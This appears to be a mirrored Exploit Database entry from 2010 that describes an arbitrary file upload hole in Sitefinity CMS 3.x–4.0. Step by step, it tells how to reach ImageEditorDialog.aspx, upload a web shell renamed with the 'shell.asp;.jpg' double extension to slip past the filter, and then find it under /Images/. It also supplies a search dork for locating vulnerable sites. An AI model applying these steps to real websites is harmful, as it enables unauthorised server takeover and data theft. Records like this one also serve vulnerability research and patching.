Sitefinity CMS – ‘ASP.NET’ Arbitrary File Upload

• Exploit Database
• 8 阅读

• 作者： Net.Edit0r
  日期： 2010-11-17
• 类别：

  • webapps
  平台：

  • asp
• 来源：https://www.exploit-db.com/exploits/15563/

• =============================================================
  Sitefinity CMS (ASP.NET) Shell Upload Vulnerability
  =============================================================
  
  ###################################################
  #
  # Exploit Title: Sitefinity CMS (ASP.NET) Shell Upload Vulnerability
  # DDate: 16/11/2010
  # Author: Net.Edit0r
  # Software Link: www.sitefinity.com
  # Version: 3.x . 4.0
  # Tested on: windows SP2 Francais V.(Pnx2 2.0)
  # dork : "Sitefinity: Login"
  # Contact: Net.Edit0r@att.net ~ Black.hat.tm@gmail.com
  #
  ####################################################
  
  exploit # /UserControls/Dialogs/ImageEditorDialog.aspx
  
  first go to # http://site.com/sitefinity/
  
   then # http://site.com/sitefinity/UserControls/Dialogs/ImageEditorDialog.aspx
  
   select # asp renamed via the .asp;.jpg (shell.asp;.jpg)
  
  Upload to # http://site.com/Images/[shell]
  
  
  Video : http://net-edit0r.persiangig.com/Film/0day.rar
  
  #######################################################
  
  Home : datacoders.org ~ ajaxtm.com #Iranian HackerZ
  
  >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
  
  Greetz : HUrr!c4nE , H-SK33PY , Cair3x , B3hz4d ,Raiden , m4hd1 ,P0W3RFU7
  
   BHG : Net.Edit0r ~ Darkcoder ~ AmIr_Magic ~ keracker